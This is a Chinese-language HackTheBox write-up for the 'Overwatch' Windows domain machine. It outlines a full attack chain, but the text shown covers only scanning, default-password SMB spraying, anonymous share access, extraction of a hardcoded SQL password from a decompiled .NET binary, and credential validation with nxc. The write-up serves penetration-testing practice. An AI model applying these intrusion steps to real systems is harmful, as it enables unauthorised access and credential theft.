HackTheBox-Overwatch

你在南方的艳阳里大雪纷飞
我在北方的寒夜里四季如春
如果天黑之前来得及
我要忘了你的眼睛
穷极一生做不完一场梦

---

靶机ip：10.129.6.144

难度：中等

涉及内容：

全端口服务扫描与信息搜集：利用 Rustscan、Nmap 快速定位资产，并通过 Fscan 进行自动化漏扫和存活确认。

匿名 SMB 枚举与敏感文件泄露：通过 smbclient 发现匿名访问权限下的 software$ 共享文件夹，获取核心业务程序及配置。

.NET 静态逆向分析：对 MSIL 指令集进行反编译，从中提取硬编码的数据库连接凭据。

ADIDNS (Active Directory Integrated DNS) 注入：利用域用户权限向域控写入恶意 A 记录，实现内网域名劫持。

MSSQL 链路泄露与凭据捕获：滥用 MSSQL 的 Linked Server 特性，配合 Responder 诱导服务端发起认证并抓取明文密码。

内网纵向移动与内网穿透：通过 Evil-WinRM 获取初始权限，并利用 frp 实现反向端口转发以绕过防火墙访问内网 WCF 服务。

WCF (Windows Communication Foundation) 漏洞利用：针对 .NET 服务中的 PowerShell 管道拼接逻辑进行命令注入（Command Injection）。

权限提升 (Privilege Escalation)：通过注入代码以 SYSTEM 权限执行，实现从普通域用户到系统最高权限的跨越。

---

端口扫描

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 10.129.6.144 -- -sV -sC -T4 -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
You miss 100% of the ports you don't scan. - RustScan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.129.6.144:53
Open 10.129.6.144:88
Open 10.129.6.144:135
Open 10.129.6.144:139
Open 10.129.6.144:445
Open 10.129.6.144:464
Open 10.129.6.144:3268
Open 10.129.6.144:3269
Open 10.129.6.144:3389
Open 10.129.6.144:5985
Open 10.129.6.144:6520
Open 10.129.6.144:9389

Open 10.129.6.144:49664
Open 10.129.6.144:49669
Open 10.129.6.144:57989
Open 10.129.6.144:62662
Open 10.129.6.144:62663
Open 10.129.6.144:65158
Open 10.129.6.144:65177
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV -sC -T4 -A" on ip 10.129.6.144
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-03 01:35 -0500
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:35
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE: Active NSE Script Threads: 1 (0 waiting)
NSE Timing: About 0.00% done
Completed NSE at 01:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
Initiating Ping Scan at 01:35
Scanning 10.129.6.144 [4 ports]
Completed Ping Scan at 01:35, 0.11s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 01:35
Scanning overwatch.htb (10.129.6.144) [19 ports]
Discovered open port 139/tcp on 10.129.6.144
Discovered open port 445/tcp on 10.129.6.144
Discovered open port 464/tcp on 10.129.6.144
Discovered open port 3389/tcp on 10.129.6.144
Discovered open port 135/tcp on 10.129.6.144
Discovered open port 53/tcp on 10.129.6.144
Discovered open port 65177/tcp on 10.129.6.144
Discovered open port 88/tcp on 10.129.6.144
Discovered open port 5985/tcp on 10.129.6.144
Discovered open port 3269/tcp on 10.129.6.144
Discovered open port 49664/tcp on 10.129.6.144
Discovered open port 62662/tcp on 10.129.6.144
Discovered open port 3268/tcp on 10.129.6.144
Discovered open port 49669/tcp on 10.129.6.144
Discovered open port 65158/tcp on 10.129.6.144
Discovered open port 9389/tcp on 10.129.6.144
Discovered open port 6520/tcp on 10.129.6.144
Discovered open port 62663/tcp on 10.129.6.144
Completed SYN Stealth Scan at 01:35, 1.51s elapsed (19 total ports)
Initiating Service scan at 01:35
Scanning 18 services on overwatch.htb (10.129.6.144)
Completed Service scan at 01:36, 55.73s elapsed (18 services on 1 host)
Initiating OS detection (try #1) against overwatch.htb (10.129.6.144)
Retrying OS detection (try #2) against overwatch.htb (10.129.6.144)
Initiating Traceroute at 01:36
Completed Traceroute at 01:36, 0.15s elapsed
Initiating Parallel DNS resolution of 1 host. at 01:36
Completed Parallel DNS resolution of 1 host. at 01:36, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
NSE: Script scanning 10.129.6.144.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:36
NSE Timing: About 99.96% done; ETC: 01:37 (0:00:00 remaining)
Completed NSE at 01:37, 40.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:37
Completed NSE at 01:37, 3.51s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:37
Completed NSE at 01:37, 0.00s elapsed
Nmap scan report for overwatch.htb (10.129.6.144)
Host is up, received echo-reply ttl 127 (0.13s latency).
Scanned at 2026-03-03 01:35:45 EST for 106s

PORT      STATE    SERVICE       REASON          VERSION
53/tcp    open     domain        syn-ack ttl 127 (generic dns response: SERVFAIL)
88/tcp    open     kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-03-03 06:35:53Z)
135/tcp   open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open     netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds? syn-ack ttl 127
464/tcp   open     kpasswd5?     syn-ack ttl 127
3268/tcp  open     ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped    syn-ack ttl 127
3389/tcp  open     ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2026-03-03T06:37:28+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Issuer: commonName=S200401.overwatch.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-12-07T15:16:06
| Not valid after:  2026-06-08T15:16:06
| MD5:     0da8 f9a5 d788 e363 07b1 5f70 6524 ffcb
| SHA-1:   3287 c62d 4408 7fbb 4038 00b3 32fa da67 fb22 14bc
| SHA-256: b8ca 73a4 d338 1c57 3558 eec9 d8d1 9381 5b2d e30e 7945 ff69 0565 8935 84da f28a
| -----BEGIN CERTIFICATE-----
| MIIC7jCCAdagAwIBAgIQQB+9JS5+iIRHlnVDL5wRazANBgkqhkiG9w0BAQsFADAg
| MR4wHAYDVQQDExVTMjAwNDAxLm92ZXJ3YXRjaC5odGIwHhcNMjUxMjA3MTUxNjA2
| WhcNMjYwNjA4MTUxNjA2WjAgMR4wHAYDVQQDExVTMjAwNDAxLm92ZXJ3YXRjaC5o
| dGIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDmHUjAEelxLdt0uNeO
| ah2/XpNZQsIekINBswk9QIsJPsCdFScs60OIcc+kq9JyruEYQ44SGcnAMdRM1Aal
| mhhyLcJ0BX1pqcFQASSHbClRBwzW8O+7cZaWrVRV8l616Q9dOBVqtMMe7gK/qfOF
| mdE21VNURJ4LcDQ2BUBBjy0MKcCEEImly3cCyKyS7gCHi5VZ6GlShWykPSDq75Ob
| eM3S3zrbxogClJDUmfvay9vCRVyn33DW3Bf35dno2aEaYHzg9JMboey/XfgCNxQE
| wx7/GVjFxMo4CV3uZuDEPwaKH9S89Ta56Fgg3GcRCXrFqdhTN5Y+OJ2Ej/C4Jg0F
| j2wRAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDAN
| BgkqhkiG9w0BAQsFAAOCAQEAeR1mQymcP9NndxSFRjKvk+J9t0peN+caudPqj0nU
| MrlmzV05FyNCo3AiaoLRPBg6f29dqps/H2aJPzA8E3thAdNEgnAisbDWve6Ze1Pc
| XD0iUbe/KCIhqeRTpcD57UPjBb45lTcocPDLXlz5X4iFUhEiWqJXwkCnyNM+bgZl
| uPzaH52mU+sBikSLQfAppkg5MwRA+sCK8QhivS7BcwkolFrciEpWmlr0bHS0lCiR
| xlt1TwWNi2qGwnTfrO1Kag1P/Ky10JP3+X1r/KXb+71R3KwxCW/Bs9w6ZkCcwOLp
| 1lI8KPv4qke+B5jnwoDg+7x+0kZL3G2IT4atv6rCfYHooA==
|_-----END CERTIFICATE-----
| rdp-ntlm-info: 
|   Target_Name: OVERWATCH
|   NetBIOS_Domain_Name: OVERWATCH
|   NetBIOS_Computer_Name: S200401
|   DNS_Domain_Name: overwatch.htb
|   DNS_Computer_Name: S200401.overwatch.htb
|   DNS_Tree_Name: overwatch.htb
|   Product_Version: 10.0.20348
|_  System_Time: 2026-03-03T06:36:49+00:00
5985/tcp  open     http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6520/tcp  open     ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ssl-date: 2026-03-03T06:37:28+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-03-03T05:48:24
| Not valid after:  2056-03-03T05:48:24
| MD5:     9fd7 9ca6 befd 1a66 036e 81aa f910 4e27
| SHA-1:   ba8c 37eb 8b91 22a9 7756 9052 9399 5618 a3f3 f366
| SHA-256: 5e1e 4cee b679 3777 50e6 54eb a9ae c118 3382 f647 ffe6 5e0e 0952 06a3 47a6 9820
| -----BEGIN CERTIFICATE-----
| MIIEADCCAmigAwIBAgIQZhR7b0ZyXZBIzMoKQq1N5DANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjYwMzAzMDU0ODI0WhgPMjA1NjAzMDMwNTQ4MjRaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCAaIwDQYJKoZIhvcNAQEBBQADggGPADCCAYoCggGBALId/Kc/
| 4V/tqOorxreUsc/U7R5pEZhmLLmAZ9x13StdJkiam3dL0fAfvD3/Gyo6zFhTMIHn
| 7O6XoyL3EKcRCrDhrXJN1zfNYNH+Z3dutjrQ5i2LviE7DKua9+IJV7eXRfpRzLG1
| MhXjEeKFSG+hkXtsW3R4eMiEM/ZxEhFX5xt5dX7uLoArAKjk3kq2Rpl2bo4AmQ2O
| BNTkHE+TCXpv4DdUUyH1fjNE9xnGIewW3twpkOOPBlZEvEAPo2PVvJKqMqvgGrXI
| 44Q5MUltUEGe+ykjqq+VoZjmMOfs4yc6wDHUgz3SutGfh0681X0hO8X9JsKZEiDD
| YS4Vu1Doeu4ljW6Ue1QUNx+7+anlGMeyKFhwFRdmyg7pHa57pxPWVYkO0TusN4uy
| LjNyH9n0FjrcWmBGAmmZ2cTrqbAyZ6hB1Bma4eOZ3RC9PsNSAD2NQ2jRB+lc7yCZ
| d+iTTrXA+S5vR70+emsvb4z58FGNxBWpHKAy/FUeme99PkidkIVf/582HQIDAQAB
| MA0GCSqGSIb3DQEBCwUAA4IBgQCwy/6SG9EtvE1cJ+zgqdhJHqbCaAMqaTIV/mJ2
| doy2QOXI5h/Na/MJkn8IGH/zLrfuvUBUGa78Eftf3XWtjy7T+0+BfFoZ3UG/RgAX
| iVZb4yQezuZzZqztFBKKgB3EYeshX8lq5r8MTzdpjw/nJEGIZq3vTNWQ0CM4Gxt4
| A6vEnhMa1MqEJiDL/4iWy3q+IOFFUM4eoQJmfaWUW7DPMK3c0mR0ZShXFyLIfCQ+
| jOqcYLb6g1tOCx18fQHNrAqBFOoHAmL9Quq4r6GO6pA7m17BgkevLsdk3x3+tn11
| N9xFFn/WlxXrtSg6h3ehqLjuti3FVzfBzGZw9kM3wt2ATqVG3s5Dvijy/5Xj3b9o
| 3/in6PyYiX9NX7uLekTqKGcTw30D6DGBBS9jjiFRurIYAK6DUgIKTu1I8YZfkd9U
| AryK+yW/WFDvtl+3AVD7r+3o+xpuxr7ZoNLszcGXAwJpiTpvzDXqd83Zj/abp4Y8
| 1MHmRWjBkJWWdGs6tB8dxh0nom4=
|_-----END CERTIFICATE-----
| ms-sql-info: 
|   10.129.6.144:6520: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 6520
| ms-sql-ntlm-info: 
|   10.129.6.144:6520: 
|     Target_Name: OVERWATCH
|     NetBIOS_Domain_Name: OVERWATCH
|     NetBIOS_Computer_Name: S200401
|     DNS_Domain_Name: overwatch.htb
|     DNS_Computer_Name: S200401.overwatch.htb
|     DNS_Tree_Name: overwatch.htb
|_    Product_Version: 10.0.20348
9389/tcp  open     mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
57989/tcp filtered unknown       no-response
62662/tcp open     ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
62663/tcp open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
65158/tcp open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
65177/tcp open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=3/3%Time=69A68152%P=x86_64-pc-linux-gnu%r(DNSSt
SF:atusRequestTCP,E,"\0\x0c\0\0\x90\x02\0\0\0\0\0\0\0\0");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.98%E=4%D=3/3%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=69A681AB%P=x86_64-pc-linux-gnu)
SEQ(SP=FC%GCD=1%ISR=10B%TI=I%II=I%SS=S%TS=A)
SEQ(SP=FE%GCD=1%ISR=109%TI=I%II=I%SS=S%TS=A)
OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=M552NW8ST11%O6=M552ST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Uptime guess: 0.036 days (since Tue Mar  3 00:46:00 2026)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 16863/tcp): CLEAN (Timeout)
|   Check 2 (port 21555/tcp): CLEAN (Timeout)
|   Check 3 (port 42274/udp): CLEAN (Timeout)
|   Check 4 (port 16832/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time: 
|   date: 2026-03-03T06:36:53
|_  start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   145.90 ms 10.10.14.1
2   146.18 ms overwatch.htb (10.129.6.144)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:37
Completed NSE at 01:37, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:37
Completed NSE at 01:37, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:37
Completed NSE at 01:37, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.59 seconds
           Raw packets sent: 112 (8.660KB) | Rcvd: 56 (3.240KB)

                                                           

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./FScan_2.0.1_linux_x32 -h 10.129.6.144
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1
                                                                                                                                                           
[1.2s]     已选择服务扫描模式                                                                                                                              
[1.2s]     开始信息扫描
[1.2s]     最终有效主机数量: 1
[1.2s]     开始主机扫描
[1.2s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle                             
[1.2s]     有效端口数量: 233
[1.3s] [*] 端口开放 10.129.6.144:88
[1.3s] [*] 端口开放 10.129.6.144:135
[1.3s] [*] 端口开放 10.129.6.144:389
[1.3s] [*] 端口开放 10.129.6.144:139
[1.3s] [*] 端口开放 10.129.6.144:445
[4.2s]     扫描完成, 发现 5 个开放端口
[4.2s]     存活端口数量: 5
[4.2s]     开始漏洞扫描
[4.3s]     POC加载完成: 总共387个，成功387个，失败0个
[4.5s] [*] NetInfo 扫描结果
目标主机: 10.129.6.144                                                                                                                                     
主机名: S200401                                                                                                                                            
发现的网络接口:                                                                                                                                            
   IPv4地址:                                                                                                                                               
      └─ 10.129.6.144                                                                                                                                      
   IPv6地址:                                                                                                                                               
      └─ dead:beef::fd3d:fdfe:9cc6:99c0                                                                                                                    
[7.2s] [+] SMB认证成功 10.129.6.144:445 admin:123456
[7.9s]     SMB2共享信息 10.129.6.144:445 admin Pass:123456 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[7.9s]     SMB2共享信息 10.129.6.144:445 admin Pass:admin 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[7.9s]     SMB2共享信息 10.129.6.144:445 admin Pass:admin123 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.0s]     SMB2共享信息 10.129.6.144:445 admin Pass:root 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.0s]     SMB2共享信息 10.129.6.144:445 admin Pass: 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.1s]     SMB2共享信息 10.129.6.144:445 admin Pass:pass123 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.2s]     SMB2共享信息 10.129.6.144:445 admin Pass:pass@123 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.2s]     SMB2共享信息 10.129.6.144:445 admin Pass:password 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.3s]     SMB2共享信息 10.129.6.144:445 admin Pass:P@ssword123 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.3s]     SMB2共享信息 10.129.6.144:445 admin Pass:Password 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[1m24s]     扫描已完成: 9/9

smb服务探测

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -L //10.129.6.144
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        software$       Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.6.144 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

有一个名叫software的目录，尝试读取

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -N //10.129.6.144/software$
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DH        0  Fri May 16 21:27:07 2025
  ..                                DHS        0  Thu Jan  1 01:46:47 2026
  Monitoring                         DH        0  Fri May 16 21:32:43 2025

                7147007 blocks of size 4096. 1135048 blocks available
smb: \> cd Monitoring\
smb: \Monitoring\> dir
  .                                  DH        0  Fri May 16 21:32:43 2025
  ..                                 DH        0  Fri May 16 21:27:07 2025
  EntityFramework.dll                AH  4991352  Thu Apr 16 16:38:42 2020
  EntityFramework.SqlServer.dll      AH   591752  Thu Apr 16 16:38:56 2020
  EntityFramework.SqlServer.xml      AH   163193  Thu Apr 16 16:38:56 2020
  EntityFramework.xml                AH  3738289  Thu Apr 16 16:38:40 2020
  Microsoft.Management.Infrastructure.dll     AH    36864  Mon Jul 17 10:46:10 2017
  overwatch.exe                      AH     9728  Fri May 16 21:19:24 2025
  overwatch.exe.config               AH     2163  Fri May 16 21:02:30 2025
  overwatch.pdb                      AH    30208  Fri May 16 21:19:24 2025
  System.Data.SQLite.dll             AH   450232  Sun Sep 29 16:41:18 2024
  System.Data.SQLite.EF6.dll         AH   206520  Sun Sep 29 16:40:06 2024
  System.Data.SQLite.Linq.dll        AH   206520  Sun Sep 29 16:40:42 2024
  System.Data.SQLite.xml             AH  1245480  Sat Sep 28 14:48:00 2024
  System.Management.Automation.dll     AH   360448  Mon Jul 17 10:46:10 2017
  System.Management.Automation.xml     AH  7145771  Mon Jul 17 10:46:10 2017
  x64                                DH        0  Fri May 16 21:32:33 2025
  x86                                DH        0  Fri May 16 21:32:33 2025

                7147007 blocks of size 4096. 1135398 blocks available
smb: \Monitoring\> 

东西挺多

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat overwatch.exe.config 
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <!-- For more information on Entity Framework configuration, visit http://go.microsoft.com/fwlink/?LinkID=237468 -->
    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false" />
  </configSections>
  <system.serviceModel>
    <services>
      <service name="MonitoringService">
        <host>
          <baseAddresses>
            <add baseAddress="http://overwatch.htb:8000/MonitorService" />
          </baseAddresses>
        </host>
        <endpoint address="" binding="basicHttpBinding" contract="IMonitoringService" />
        <endpoint address="mex" binding="mexHttpBinding" contract="IMetadataExchange" />
      </service>
    </services>
    <behaviors>
      <serviceBehaviors>
        <behavior>
          <serviceMetadata httpGetEnabled="True" />
          <serviceDebug includeExceptionDetailInFaults="True" />
        </behavior>
      </serviceBehaviors>
    </behaviors>
  </system.serviceModel>
  <entityFramework>
    <providers>
      <provider invariantName="System.Data.SqlClient" type="System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer" />
      <provider invariantName="System.Data.SQLite.EF6" type="System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6" />
    </providers>
  </entityFramework>
  <system.data>
    <DbProviderFactories>
      <remove invariant="System.Data.SQLite.EF6" />
      <add name="SQLite Data Provider (Entity Framework 6)" invariant="System.Data.SQLite.EF6" description=".NET Framework Data Provider for SQLite (Entity Framework 6)" type="System.Data.SQLite.EF6.SQLiteProviderFactory, System.Data.SQLite.EF6" />
    <remove invariant="System.Data.SQLite" /><add name="SQLite Data Provider" invariant="System.Data.SQLite" description=".NET Framework Data Provider for SQLite" type="System.Data.SQLite.SQLiteFactory, System.Data.SQLite" /></DbProviderFactories>
  </system.data>
</configuration>                                        

数据库使用sqlite，而且似乎在内网开启了8000端口，是一个服务端口。

ldap探测

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc ldap 10.129.6.144 -u "" -p ""
LDAP        10.129.6.144    389    S200401          [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb) (signing:None) (channel binding:No TLS cert)                                                                                                                                            
LDAP        10.129.6.144    389    S200401          [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090D0D, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP        10.129.6.144    389    S200401          [+] overwatch.htb\: 
                                                                          

下载overwatch.exe进行逆向分析

smb: \Monitoring\> get overwatch.exe
getting file \Monitoring\overwatch.exe of size 9728 as overwatch.exe (19.9 KiloBytes/sec) (average 453.1 KiloBytes/sec)
smb: \Monitoring\> 

使用ida打开分析，查看在Program__CheckEdgeHistory中硬编码了数据库连接凭据的字符串变量aServerLocalhos

loc_35B:
call     string [mscorlib]System.IO.Path::GetTempFileName()
stloc.1
ldloc.0
ldloc.1
ldc.i4.1
call     void [mscorlib]System.IO.File::Copy(string, string, bool)
  .try {
ldstr    aServerLocalhos // "Server=localhost;Database=SecurityLogs;"...
newobj   instance void [System.Data]System.Data.SqlClient.SqlConnection::.ctor(string)
stloc.2
  .try {
ldloc.2
callvirt instance void [System.Data]System.Data.Common.DbConnection::Open()
newobj   instance void [System.Data]System.Data.SqlClient.SqlCommand::.ctor()
stloc.3
  .try {
ldloc.3
ldloc.2
callvirt instance void [System.Data]System.Data.SqlClient.SqlCommand::set_Connection(class [System.Data]System.Data.SqlClient.SqlConnection)
ldstr    aDataSource    // "Data Source="
ldloc.1
ldstr    aVersion3      // ";Version=3;"
call     string [mscorlib]System.String::Concat(string, string, string)
newobj   instance void [System.Data.SQLite]System.Data.SQLite.SQLiteConnection::.ctor(string)
stloc.s  4
ldloc.s  4
callvirt instance void [System.Data]System.Data.Common.DbConnection::Open()
ldstr    aSelectUrlLastV // "SELECT url, last_visit_time FROM urls O"...
ldloc.s  4
newobj   instance void [System.Data.SQLite]System.Data.SQLite.SQLiteCommand::.ctor(string, class [System.Data.SQLite]System.Data.SQLite.SQLiteConnection)
callvirt instance class [System.Data.SQLite]System.Data.SQLite.SQLiteDataReader [System.Data.SQLite]System.Data.SQLite.SQLiteCommand::ExecuteReader()
stloc.s  5
br.s     loc_3EF

"Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv;"

获得凭据

sqlsvc:TI0LKcfHzZw1Vv

使用nxc测试凭据是否可用

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.6.144 -u "sqlsvc" -p "TI0LKcfHzZw1Vv" --shares
SMB         10.129.6.144    445    S200401          [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:None) (Null Auth:True)                                                                                                                                        
SMB         10.129.6.144    445    S200401          [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv 
SMB         10.129.6.144    445    S200401          [*] Enumerated shares
SMB         10.129.6.144    445    S200401          Share           Permissions     Remark
SMB         10.129.6.144    445    S200401          -----           -----------     ------
SMB         10.129.6.144    445    S200401          ADMIN$                          Remote Admin
SMB         10.129.6.144    445    S200401          C$                              Default share
SMB         10.129.6.144    445    S200401          IPC$            READ            Remote IPC
SMB         10.129.6.144    445    S200401          NETLOGON        READ            Logon server share 
SMB         10.129.6.144    445    S200401          software$       READ            
SMB         10.129.6.144    445    S200401          SYSVOL          READ            Logon server share 

确认可用，先枚举一下用户

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.6.144 -u "sqlsvc" -p "TI0LKcfHzZw1Vv" --users 
SMB         10.129.6.144    445    S200401          [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:None) (Null Auth:True)                                                                                                                                        
SMB         10.129.6.144    445    S200401          [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv 
SMB         10.129.6.144    445    S200401          -Username-                    -Last PW Set-       -BadPW- -Description-                                
SMB         10.129.6.144    445    S200401          Administrator                 2025-05-17 03:09:35 0       Built-in account for administering the computer/domain                                                                                                                                                  
SMB         10.129.6.144    445    S200401          Guest                         2025-05-17 04:34:27 0       Built-in account for guest access to the computer/domain                                                                                                                                                
